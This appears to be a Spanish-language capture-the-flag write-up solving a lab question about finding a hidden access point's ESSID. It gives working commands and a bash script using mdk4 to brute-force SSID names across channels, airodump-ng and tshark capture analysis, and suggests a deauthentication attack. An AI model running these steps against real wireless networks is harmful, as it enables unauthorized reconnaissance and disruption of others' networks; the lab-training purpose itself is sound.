04. What is the ESSID of the hidden AP (mac F0:9F:C2:6A:88:26)?

50 puntos


  • Activar modo monitor sobre interfaz detectada

sudo airmon-ng start <wlan_interface>
  • Crear diccionario con fichero /root/rockyou-top100000.txt adaptado para el nombre de los ESSID genéricos dispuestos en el laboratorio (con prefijo wifi-)

cat /root/rockyou-top100000.txt | awk '{print "wifi-" $1}' > wifi.txt
  • Crear script en bash de nombre essid-discovery.sh para aplicar fuerza bruta con los nombre de essid dispuestos en fichero wifi.txt, sobre los 11 canales del rango de 2.4 GHz a través de mdk4

#!/bin/bash

read -p "Enter your network interface in monitor mode: " wifi_int

bssid="F0:9F:C2:6A:88:26"
wordlist="/root/wifi.txt"

for channel in {1..11}; do
    echo -e "\nScanning channel $channel...\n"
    iwconfig $wifi_int channel $channel

    mdk4 $wifi_int p -t $bssid -f $wordlist

    echo -e "Channel $channel finished...\n"
done

echo "Bye..."
  • Asignar permisos de ejecución al script creado y ejecutar redirigendo la salida a un fichero de nombre output.txt

 chmod +x essid-discovery.sh
 ./essid-discovery.sh
  • o ejecutar directamente con bash

bash essid-discovery.sh
  • Revisar el output de la ejecución anterior y analizar el mensaje "Probe Response from target AP with SSID..."

  • Otra opción es que al ejecutar el script, redirigir el output a un fichero para filtrar posteriormente por la cadena "Probe Response from target AP with SSID", la cual es parte de la respuesta emitida por mdk4 cuando logra obtener respuesta de un dispositivo asociado a un BSSID consultado

./essid-discovery.sh > output.txt
cat output.txt | grep -i "probe response from target ap with ssid..."

Otra forma de abarcar este ejercicio

  • Otra forma de obtener el ESSID del AP es capturar tráfico con Airodump-ng sobre el BSSID entregado

  • Activar modo monitor sobre interfaz detectada

sudo airmon-ng start <wlan_interface>
  • Realizar escaneo de redes sobre el BSSID entregado y generar fichero de salida

sudo airodump-ng --write output-04 --bssid F0:9F:C2:6A:88:26 <wlan_interface>
  • Analizar fichero de salida con tshark, del cual solo se obtendrá un paquete Beacon capturado

tshark -r output-04.cap
  • Debido a que el tráfico solo posee un paquete Beacon, es imposible conocer el ESSID, ya que en este paquete no se tramita esta información, pero si podemos obtener el BSSID desde el paquete

tshark -r output.cap -Y "wlan.fc.type_subtype==8" -T fields -e wlan.bssid
  • Para obtener el ESSID debiésemos generar un ataque de desautenticación sobre algún dispositivo que tenga conectado el AP (para este ejercicio el AP no posee ningún dispositivo conectado), para que se generase el envío de paquetes Probe Request y Probe Response entre ambos, ya que en el paquete Probe Request se tramita el ESSID del AP. El comando de filtro sería el mismo, pero cambiaría el tipo de paquete y el campo de análisis

tshark -r output.cap -Y "wlan.fc.type_subtype==4" -T fields -e wlan.ssid

RESUELTO